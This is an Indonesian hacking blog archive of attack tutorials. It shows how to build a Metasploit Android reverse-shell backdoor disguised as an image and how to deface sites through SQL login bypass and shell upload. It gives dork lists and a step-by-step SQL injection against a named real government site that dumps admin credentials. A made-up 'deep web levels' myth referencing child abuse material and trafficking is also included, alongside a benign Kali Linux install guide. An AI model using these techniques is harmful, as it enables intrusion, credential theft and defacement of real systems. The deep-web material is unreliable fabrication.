Senin, 21 Oktober 2019



Cara membuat Payload Images Metasploit di termux...
"NO ROOT"
# Pertama" kalian harus install dulu paket" (packages).nya...
.
$ pkg update upgrade
$ pkg install root-repo unstable-repo x11-repo
$ pkg install -y git python python2 nodejs ruby
$ pkg install -y openssh openssl curl
# Ok sekarang kalian harus install Metasploit-Framework.nya...
.
$ pkg install -y wget && wget https://raw.githubusercontent.com/…/me…/master/metasploit.sh
$ chmod +x metasploit.sh
$ ./metasploit.sh
# Jika install Metasploit.nya sudah kelar, sekarang membuat backdoor.nya...
# Tetapi sebelum membuat backdoor, kita connect.kan dulu serveo.nya...
.
> ssh -R <public-port>:localhost:<local-port> serveo.net
contoh :
$ ssh -R 3387:localhost:4444 serveo.net
@ Sampai muncul tulisan hijau : Forwarding TCP connections from serveo.net:3387
# Ok sekarang kita ping serveo.net utk memastikan apakah sudah benar" berjalan atau tidak.nya...
# Open new season 2
.
$ ping serveo.net
PING serveo.net (159.89.214.31) 56(84) bytes of data.
# Nah sekarang kita buat backdoor metasploit.nya, open new season 3...
.
$ termux-setup-sdcard (izinkan akses sdcard)
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=159.89.214.31 LPORT=3387 -o $HOME/backdoor.apk
# Jika backdoor sudah jadi, sekarang kalian copy gambar file.jpg ke termux...
contoh :
.
$ cd /sdcard/Download
$ cp -R images.jpg $HOME
$ cd
# Sekarang kita satukan backdoor aplikasi dgn images.jpg...
.
$ cat images.jpg backdoor.apk > namaimages.jpg
# Ok jika sudah jadi Payload Images.nya kita coba utk lancarkan serangan dgn metasploit...
.
$ msfconsole
msf5 > use exploit/multi/handler
msf5 > set payload android/meterpreter/reverse_tcp
msf5 > set LHOST 0.0.0.0
msf5 > set LPORT 4444
msf5 > run
> Open payload images.nya...
meterpreter > …
# Jika ssh tidak bisa sambung ke meterpreter kalian harus menggunakan ngrok...
# Ok thanks semoga bermanfaat...
# SMK INFORMATIKA SUMBER ILMU TULANGAN

Kamis, 17 Oktober 2019


 DEFACE BYPASS ADMIN+TEBAS INDEX
-shell backdoor
-Script deface
-dork
inurl:/admin.php intext:login intext:adminsitrator
inurl:/admin/index.php site:.
inurl :/admin/Admin.php intext:login
inurl:/administrator/login.php site:.
inurl:/login.php intext:administrator
inurl:/admin/login.php
-kesabaran(karena tidak semua web vuln)
Langsung saja
Kalian harus dorking di goggle missal dork inurl:/admin/login.php site:in
Pilih salah satu web
Isi username sama pw nya
‘=’’or’
Jika gagal login berarti web tersebut tidak vuln bypass admin (cari lagi:v)
Jika berhasil maka akan di arahkan ke dashboard admin
Jika sudah masuk ke dashboard admin cari tempat upload biasa nya di add news atau upload image
Tinggal upload shell nya lalu klik upload atau submit
T E R U P L O A D
Jika sudah upload shell nya tinggal panggil  caranya klik kanan gambar rusak view image atau klo android tekan gambar yg
rusak view image atau copy url image
#SIAPA TAU BERGUNA
# SMK INFORMATIKA TULANGAN

     Assalamualaikum wr wb. Di halaman ini, Author akan membahas tentang tentang Deep Web... simak lah dengan benar-benar, karena ini semua sudah
saya rangkum dengan cara saya sendiri
Deep Web terdiri dari situs-situs/website yang tidak diindeks oleh mesin pencari Internet.
Deep = kedalaman/ mendalam
Web = website/ web yang berada di internet
Jadi, Deep Web bisa di artikan menjadi, Website yang berada di bagian terdalam di internet dan tidak bisa di akses secara langsung/ sulit di akses.
Deep web biasanya berdomain ujungnya .onion cth: 4mrj4jkwklj1945ica.onion
oh iya, di deep web, web di sana berdomain terlihat asal-asal-an ya bertujuan agar sulit di temukan...
Mr. J : Author, kenapa tujuannya agar sulit di temukan?
author: Yang ber-IQ tinggi pasti dah tau maksud dari tujuan itu ^_^
Untuk kalian yang hanya sekedar lihat-lihat saja... lebih baik jangan sampai terlalu menyelam ke bagian dark net, jika mental kalian lemah ya pasti nya
akan membuat kalian gila XD
Ketahuilah... di bagian dark net itu banyak video orang yang di siksa... seperti eksperimen manusia + hewan, pembunuh bayaran yang ketika kita salah
mengklik saja bisa-bisa membunuh diri kita sendiri, POKOK NYA ITU ADALAH PASAR GELAP YANG ISI NYA GILA SEMUA !.

Level-level Deep WEB :

Level 0 - Common web
dangerLevel web ini adalah level di mana kalian sering mengkasesnya secara langsung... cth: bloger, youtube, facebook, twiter, DLL yang bisa di akses.

Level 1 - Surface web
Terdapat
Reddit
Temple Email Services
Newgrounds
Vampire Freaks
Foreign Social Networks
Human Intel Tasks
Web Hosting
MYSQL[sic] Databases
College Campuses
This level is still accessible through normal means, but contains “darker” websites, such as Reddit.
Tingkat ini masih dapat diakses melalui sarana normal, tetapi berisi situs-situs "gelap", seperti Reddit.

Level 2 - Bergie Web
Terdapat
4chan
RSC
freehive
streams videos
jailbait porn
most of the internet
DLL
dangerTingkat ini adalah yang terakhir biasanya dapat diakses: semua tingkat yang mengikuti ini harus diakses dengan proxy, Tor atau dengan
memodifikasi perangkat keras Anda. Di level ini Anda dapat menemukan beberapa situs web "bawah tanah" tetapi masih diindeks, seperti 4chan
(Dulunya forum anonymouse).

Level 3 - Deep web
Terdapat
"On the Vanilla" Sources
Heavy Jailbait
Light CP
Gore
Celebrity Scandals
VIP Gossip
Script Kiddies
Virus Information
FOIE Archives
Suicides
Raid Information
Computer Security
XSS Worm Scripting
FTP Servers (Specific)
Mathematics Research
Supercomputing
Visual Processing
Virtual Reality (Specific)
dangerBagian pertama dari level ini harus diakses dengan proxy. Ini berisi CP, gore, peretasan situs web ... Di sini dimulai Deep Web. Bagian kedua dari
level ini hanya dapat diakses melalui Tor, dan mengandung informasi yang lebih masuk akal.

Level 4 - Charter web/ Dark Net/ Dark Web
Terdapat
Hardcandy
Onion IB
Hidden Wiki
Candycane
Banned Videos
Banned Movies
Banned Books
Questionable Visual Materials
Personal Records
"Line of Blood" Locations
Assassination Box
Headhunters
Illegal Game Hunters
Rare Animal Trade
Hard Drugs Trade
Human Trafficking
Corporate Exchange
Multi-Billion Dollar Deals
Most of the Black Market
dangerTingkat ini juga dibagi menjadi dua bagian. Yang pertama dapat diakses melalui Tor. Hal-hal seperti perdagangan narkoba dan manusia, film
terlarang dan buku-buku serta pasar gelap ada di sana. Bagian kedua dapat diakses melalui modifikasi perangkat keras: "Sistem Shell Tertutup".
Bagian ini dari Piagam Web berisi CP hardcore, informasi perangkat keras eksperimental ("Gadolinium Gallium Garnet Quantum
ProsesorElektronik"), tetapi juga informasi yang lebih gelap, seperti "Hukum 13", Perang Dunia 2 percobaan, Red Room, dan bahkan lokasi Atlantis.

Level 5 - Marianas Web
dangerJika guys-guys :v berhasil menjangkau bagian ini, selamat kalian beruntung. ada yang bilang di sini banyak dokumentasi rahasia pemerintah.
Pada hari Anda tiba di sini, Anda secara resmi tidak lagi homo.
Sekarang sebelum kita melangkah lebih jauh w ingin memberi tahu they (kalian) bahwa 5 lapisan di atas hanya ada beberapa orang yang berhasil
mencapai sampai level 5-The Marianas Web mungkin terdengar seperti mitos tetapi tidak ada yang tidak mngkin, itu benar-benar ada.
Sekarang untuk lapisan 6-8:

Level 6
dangerLevel 6 adalah perantara antara Marianas Web dan Level 7 disebut juga sebagai THE FOG/ VIRUS SOUP. Pada bagian ini kalian akan mulai
serius. Banyak orang-orang datang untuk membunuhmu. Sedikit dari semua orang berpikir bahwa ada 8 lapisan secara total.
yang terakhir adalah Sistem Primarch. Anda memerlukan komputer super kuantum untuk melewati lapisan ke-6. dan ini adalah di mana hal-hal
menjadi sangat nyata. lapisan 7 dari apa yang saya tahu adalah di mana para pemain besar n pemain super pro. mereka semua mencoba untuk saling
menghentikan satu sama lain. pada dasarnya ada ratusan juta (atau miliar) operasi dolar yang membutuhkan kontrol.

Level 7 - The Fog/Virus Soup
dangerTingkat ini seperti zona perang. Setiap orang untuk dirinya sendiri (egois >:v) dan semua orang berusaha mencapai level 8. Orang mencoba
untuk mencegah orang lain mencapai Level 8 dengan cara apa pun yang diperlukan.
Level 7 ini juga terdapat perang cyber for pro/ pertukaran dokumen/ hingga virus menurut beberapa sumber yang saya dapatkan level ini adalah
tempat di mana banyakmya hackel atau agen pemerintah saling serang dan mejual beli data-data yang berbahaya.

Level 8 - The Primarch System
dangerLevel 8 tidak mungkin diakses secara langsung. Sistem Primarch secara harfiah adalah hal yang mengendalikan internet pada saat itu. Tidak ada
pemerintah yang mengontrolnya. Bahkan tidak ada yang tahu apa itu IS (internet system). Ini adalah sebuah anomali yang pada dasarnya ditemukan
oleh scan web yang sangat dalam pada awal tahun 2000-an.
Sistem ini tidak responsif tetapi mengirimkan perintah yang tidak dapat diubah ke seluruh net secara acak. Pada dasarnya seluruh layer 7 adalah orang
yang mencoba untuk mendapatkan akses ke 8 dan menghentikan orang lain (dengan biaya berapa pun) dari sana juga. Lapisan ke-8 diperkirakan
dipisahkan oleh kunci tingkat fungsi level tr001 kuantum tingkat 17. Saya tidak tahu apa itu.
Intinya:
Jika kalian mampu mencapai level 8 ini kalian bisa mengatur, mengubah, mengontrol semua IS (internet system) dengan menggunakan komputer super
kuantum yang sangat mahal.

Linux merupakan sistem operasi yang open source atau bisa dibilang gratis. Sistem operasi ini merupakan backtrack versi 6. Lalu kenapa backtrack versi 6 diganti dengan kali linux? karena pada dasarnya kali linux berdasarkan debian sedangkan backtrack berdasarkan ubuntu. versi terakhir dari Backtrack adalah Backtrack 5 R3 yang rilis pada Agustus 2012 lalu, namun jika masih ingin menggunakannya dapat dilihat di www.backtrack-linux.org.

Bisa dibilang Kali Linux merupakan reinkarnasi dari Backtrack, yang mana distro linux ini banyak digunakan untuk keperluan penetration dan testing terhadap keamanan sistem komputer. Lebih dari 300 tools penetration yang terinstall di kali linux dan siap untuk digunakan. 
Cara Install Kali Linux

Bahan - Bahan yang diperlukan :

1. Bootable Flashdisk Kali Linux atau DVD Installer Kali Linux
2. PC lengkap dengan spesifikasi minimum :

  • Minimal RAM 512 MB
  • Processor Min Intel Pentium 4 x86 atau x64
  • VGA min 128 MB
  • Harddisk Minimal berkapasitas 10 GB


Langkah - langkah penginstalan Kali Linux



1. Hidupkan atau Restart komputer, dan masuk ke BIOS. 

2. Kemudian Setting First Boot nya USB Drive jika menggunakan Bootable Flashdisk, dan Pilih CD / DVD Rom jika install melalui DVD Installer.



3. Pilih Graphical Install, disini menginstall nya menggunakan grafik agar lebih mudah. Seperti hal nya dengan menginstall windows 7.



4. Pada Select Language pilih Bahasa Inggris ( English), dan apabila ingin menggunakan bahasa selain English juga bisa. Kemudian Klik Continue


5. Select Your Location, pilih lokasi anda sekarang. Kemudian Continue


6. Configure locales, jika tidak ada Indonesia pilih saja United States


7. Pada Configure the Keyboard, key map to use nya pilih American English



8. Tunggu sebentar, proses Load Installer


9. Isi Hostname nya


10. Domain name nya bisa diisi bisa juga tidak.


11. Pada Set up password isi password root nya, dan password harus diingat agar nanti pada saat login tidak kebingungan password nya apa.


12. Configure the clock, pilih sesuai zona waktu anda. Misalnya zona waktu saya Western


13. Disini bagian yang paling penting dalam instalasi, jika tidak ingin susah - susah membagi partisi tinggal pilih Guide - use entire disk. Tapi ingat! jika di hardisk memiliki data - data yang penting, sebaiknya di backup terlebih dahulu, kali semua data akan di format pada mode ini.

Dan disini karena ingin data yang ada pada harddisk tidak ingin terhapus, maka saya pilih pembagian partisi secara Manual.


Membuat Partisi Root /

14. Disini saya mempunyai harddisk berkapasitas 16 GB, dan ingin saya bagi.


15. Pilih Create New Partition


16. Disini saya menggunakan 10 GB untuk partisi root. Kapasitas gak harus sama seperti punya saya, bisa diatur sesuai yang anda inginkan


17. Karena untuk partisi root, pilih Primary. Proses booting BIOS hanya akan membaca partisi harddisk yang menggunakan tipe Primary


18. Dan pilih Beginning


19. Use as nya pilih Ext 4 journaling file system, dan Mount point pilih / .


20. Jika sudah selesai pilih done setting up partition.

Membuat Partisi Swap


21. Pilih pada Free Space Partisi, Create new partition.


22.  Lalu isi kapasitas partisi Swap. Partisi Swap disini berkapasitas 2 kali ukuran memory (RAM). Contoh : Jika RAM 1 GB, pakai partisi Swap berkapasitas 2 GB.


23. Lalu pilih logical, dan beginning.

24. Pada use as, pilih swap area



25. Done Setting up partition

Membuat Partisi Home

26. Langkahnya sama seperti diatas, pilih partisi free space - Create new partition - Isi size partisinya  - pilih logical

27. Pada Mount Point pilih home


28. Maka akan terlihat semua partisi yang berhasil dibuat


29. Kemudian pilih Finish partition and write changes to disk
30. Pilih Yes

Tunggu beberapa menit, proses instalasi sedang berlangsung.


31. Use the network mirror? pilih No. 


32. Install grubloader pilih Yes. Disini bootloader akan berfungsi apabila komputer yang diinstall memiliki lebih dari satu sistem operasi. Makan pada saat boot sistem operasi bisa di pilih yang mana kan dijalankan.

Instalation Complete!



Assalamualaikum,ok gk perlu banyak bacot langsung saja ke materi hari ini yaitu cara deface poc jso
*Bahan*
-Pc/Hp
-Paket Internet
-Sc Jso
-Dork= -inurl:hubungi.php site:go.id
-inurl:admin/hubungi.php
-Inurl:kontak kami site:(terserah)
‌-intitle: informasi sistem kelulusan site:sch.id
-kesabaran

Setelah semua bahan nya lengkap langsung saja ke tutor nya
-pertama kalian harus ngedork,gua Makai dork -intitle: informasi sistem kelulusan site:sch.id
-setelah ngedork kalian cari hubungi kami
-nah kalian isi kolom² nya trus kolom pesan nya kalian isi sc jso kalian
-nah setelah itu kalian buka dengan cara tambahkan Exploit admin/hubungi.php
Nah selesai deh


Sekian dari tutorial saya ,ya walaupun sebenarnya sih gk ada waktu untuk buat materi tapi ini demi kalian Para blackhat
Thanks for
-SIDOARJO XPLOITER

Rabu, 16 Oktober 2019


       Injeksi SQL (SqlInjection) adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi.

Pengertian SQL Injection
SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat memasukkan perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter :
id=$id;……. > Got Error
Hal pertama yang harus kita lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter ‘ setelah atau sesudah angka pada url.
Pertama kita cari dulu website yang memiliki celah SQL Injection. silahkan sobat cari target di google dengan menggunakan dork.

Dork SQLi :
view_items.php? id =
home.php? cat =
item_book.php? CAT =
www / index.php? page =
schule / termine.php? view =
goods_detail.php? data =
storemanager / content / item.php? page_code =
view_items.php? id =
customer / board.htm? mode =
index.php? section =
index.php? page =
id / publications.php? id =
events / detail.php? ID =
forum / profile.php? id =
media / pr.php? id =
content.php? ID =
news.php? id =
content / index.php? id =
index.php? modus =
modules.php? bookid =
katalog / main.php? cat_id =
index.php? page =
detail.php? prodid =
produk / product.php? pid =
news.php? id =
detail.php? id =
category.php? id =
hm / inside.php? id =
index.php? area_id =
gallery.php? id =
products.php? cat =
products.php? cat =
general.php? id =
news.php? t =
usb / devices / showdev.php? id =
content / detail.php? id =
templet.php? acticle_id =
news / news / title_show.php? id =
product.php? id =
index.php? url =
news.php? id =
id / news / fullnews.php? newsid =
deal_coupon.php? cat_id =
show.php? id =
blog / index.php? idBlog =
content.php? id =
viewapp.php? id =
item.php? id =
profil / profile.php? profileid =
event.php? id =
gallery.php? id =
category.php? CID =
corporate / newsreleases_more.php? id =
print.php? id =
view_items.php? id =
more_details.php? id =
county-fakta / buku harian / vcsgen.php? id =
idlechat / message.php? id =
podcast / item.php? pid =
products.php? act =
details.php? prodId =
socsci / events / full_details.php? id =
ourblog.php? categoryid =
mall / more.php? ProdID =
arsip / get.php? message_id =
review / review_form.php? item_id =
index.php? pid =
download.php? id =
shop / category.php? cat_id =
i-know / content.php? page =
store / index.php? cat_id =
yacht_search / yacht_view.php? pid =
pharmaxim / category.php? cid =
print.php? sid =
specials.php? osCsid =
store.php? cat_id =
category.php? cid =
displayrange.php? rangeid =
product.php? id =
csc / news-details.php? cat =
products-display-details.php? prodid =
stockists_list.php? area_id =
news / newsitem.php? newsID =
index.php? pid =
newsitem.php? newsid =
category.php? id =
news / newsitem.php? newsID =
details.php? prodId =
publikasi / publikasi.php? id =
category.php? cid =
product / detail.php? id =
news / newsitem.php? newsID =
details.php? prodID =
item.php? item_id =
edition.php? area_id =
page.php? area_id =
view_newsletter.php? id =
feedback.php? title =
freedownload.php? bookid =
fullDisplay.php? item =
getbook.php? bookid =
GetItems.php? Itemid =
view.php? cid =
view_cart.php? title =
view_detail.php? ID =
viewcart.php? CartId =
viewCart.php? userID =
viewCat_h.php? idCategory =
viewevent.php? EventID =
viewitem.php? recor =
viewPrd.php? idcategory =
ViewProduct.php? Misc =
voteList.php? item_ID =
whatsnew.php? idCategory =
WsAncillary.php? ID =
WsPages.php? ID = noticiasDetalle.php? Xid =
sitio / item.php? idcd =
index.php? site =
de / content.php? page_id =
gallerysort.php? iid =
products.php? type =
event.php? id =
showfeature.php? id =
home.php? ID =
tas / event.php? id =
profile.php? id =
details.php? id =
past-event.php? id =
index.php? action =
site / products.php? prodid =
page.php? pId =
resources / vulnerabilities_list.php? id =
site.php? id =
products / index.php? rangeid =
global_projects.php? cid =
publikasi / view.php? id =
display_page.php? id =
pages.php? ID =
lmsrecords_cd.php? cdid =
product.php? prd =
cat /? catid =
produk / produk-list.php? id =
debat-detail.php? id =
cbmer / congres / page.php? LAN =
content.php? id =
news.php? ID =
photogallery.php? id =
index.php? id =
product / product.php? product_no =
nyheder.htm? show =
book.php? ID =
print.php? id =
detail.php? id =
book.php? id =
content.php? PID =
more_detail.php? id =
content.php? id =
view_items.php? id =
view_author.php? id =
main.php? id =
bahasa inggris / fonction / print.php? id =
magazines / adult_magazine_single_page.php? magid =
product_details.php? prodid =
magazines / adult_magazine_full_year.php? magid =
products / card.php? prodID =
catalog / product.php? cat_id =
e_board / memodifikasiform.html? code =
community / calendar-event-fr.php? id =
products.php? p =
news.php? id =
lihat / 7/9628 / 1.html? reply =
product_details.php? prodid =
catalog / product.php? pid =
rating.php? id =
? halaman =
katalog / main.php? cat_id =
index.php? page =
detail.php? prodid =
produk / product.php? pid =
news.php? id =
book_detail.php? BookID =
katalog / main.php? cat_id =
katalog / main.php? cat_id =
default.php? cPath =
katalog / main.php? cat_id =
katalog / main.php? cat_id =
category.php? catid =
category.php? cat =
category.php? cat =
detail.php? prodID =
detail.php? id =
category.php? id =
hm / inside.php? id =
index.php? area_id =
gallery.php? id =
products.php? cat =
products.php? cat =
media / pr.php? id =
books / book.php? proj_nr =
products / card.php? prodID =
general.php? id =
news.php? t =
usb / devices / showdev.php? id =
content / detail.php? id =
templet.php? acticle_id =
news / news / title_show.php? id =
product.php? id =
index.php? url =
cryolab / content.php? cid =
ls.php? id =
s.php? w =
di luar negeri / page.php? cid =
bayer / dtnews.php? id =
news / temp.php? id =
index.php? url =
book / bookcover.php? bookid =
index.php / en / komponen / pvm /? view =
product / list.php? pid =
cats.php? cat =
software_categories.php? cat_id =
print.php? sid =
docDetail.aspx? chnum =
index.php? section =
index.php? page =
index.php? page =
id / publications.php? id =
events / detail.php? ID =
category.php? c =
main.php? id =
article.php? id =
showproduct.php? productId =
view_item.php? item =
skunkworks / content.php? id =
index.php? id =
item_show.php? id =
publications.php? Id =
index.php? t =
view_items.php? id =
More_Details.php? Id =
inurl:azerty.php?id= ,
inurl:bouquin.php?id= ,
inurl:lien.php?id= ,
inurl:clavier.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:games.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=Kemudian kita akan mencari dan menghitung jumlah tabel yang ada pada database web tersebut.
silahkan sobat gunakan perintah : order by 1 - dan seterusnya sampai terjadi error pada halaman. gunaka tanda + sebagai spasi, dan pada akhir perintah gunakan tanda --.
inurl:announce.php?id=
Disini saya sudah menemukan targetnya : http://diklat.lampungprov.go.id/more.php?id=1
http://diklat.lampungprov.go.id/more.php?id=1+order+by+18-- < Error
Pada angka 18 ternyata muncul error, jadi yang kita ambil angka sebelum munculnya pesan error. itu berarti jumlah tabel pada databasenya ada 17.
Selanjutnya kita akan mencari angka tabel yang bisa kita gunakan untuk perintah2 injection pada tahap selanjutnya. Gunakan perintah union select diikuti jumlah tabel dan tanda - sebelum angka dan diakhiri dengan tanda --. contoh:
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
Disini bisa kita lihat bahwa angka yang muncul yaitu 16 dan 17. kedua angka tersebut nantinya yang akan kita masukkan perintah2 selanjutnya.
Pada tahap Selanjutnya kita akan mengetahui versi database yang dipakai oleh web tersebut. gunakan perintah "version()" atau "@@version".
contoh:
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,@@version,17--
kita bisa lihat versi database yang dipake adalah v.5.5.14, jadi pada versi 5 itu berberda dengan versi 4. prosesnya lebih repot pada versi 4, karena untuk melakukan perintah2 SQLi pada versi 4 kita harus menebak 1 per 1 tabel yang ada pada databasenya.
Sekarang perintah selanjutnya kita akan memunculkan nama-nama tabel yang ada pada web tersebut. gunakan perintah “group_concat(table_name)” dan menambahkan perintah “from+information_schema.tables+where+table_schema=database()" sesudah angka terakhir, dan diakhiri dengan tanda --.
contoh :
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(table_name),17+from+information_schema.tables+where+table_schema=database()--
Disitu kita dapatkan nama-nama tabelnya sperti : tbadmin, tbbukutamu, tbcontent, tbcounter, tbdivisi, tbgolongan, tbjadwal, dll. Langkah selanjutnya kita akan mencari username dan password admin pada tabel tbadmin. Perlu diketahui bahwa tidak semua nama tabel pada setiap web itu sama, jadi untuk mencari tabel admin, silahkan sobat kira-kira saja dimana tabel yang sobat curigai tempat username dan password admin berada. Kemudian untuk mengeluarkan isi yang ada pada kolom tbadmin gunakan perintah berikut: “group_concat(columns_name) ” dan perintah “from+information_schema.columns+where+table_name=CHAR()" sesudah angka terakhir, dan diakhiri dengan tanda --. Pada tahap ini nama tabel tbadmin harus dikonversi dulu ke bentuk decimal :) silahkan sobat gunakan toolsnya DISINI. kemudian hasil konversi tbadmin adalah 116 98 97 100 109 105 110 lalu kita masukkan ke CHAR(116, 98, 97, 100, 109, 105, 110) dan pisahkan dengan koma. jadi perintahnya seperti berikut:
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(column_name),17+from+information_schema.columns+where+table_name=CHAR(116, 98, 97, 100, 109, 105, 110)-
Nah disitu muncul kolom username, pswd, status. lalu langkah selanjutnya kita akan melihat isi dari kolom kolom yang muncul tadi dengan menambah perintah group_concat(username,0x3a,pswd,0x3a,status) . jangan lupa di setiap sela2 tambahkan kode 0x3a yg merupakan hasil konversi hexa dari tanda titik dua ( : ). lalu tambahkan perintah  +from+tbadmin--, tbadmin merupakan tabel yang kita dapatkan tadi.
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(username,0x3a,pswd,0x3a,status),17+from+tbadmin--
Nah kan udah keliatan kentot, username dan passwordnya.. :) dari gambar muncul data :
user1:8dfad4f7356a2e403c900b2944990ddc:1,user:8dfad4f7356a2e403c900b2944990ddc:0 selanjutnya sobat tinggal mengcrack password yang berbentuk md5 hash tersebut. untuk mengcracknya

Cara membuat Payload Images Metasploit di termux... "NO ROOT" # Pertama" kalian harus install dulu paket" (pa...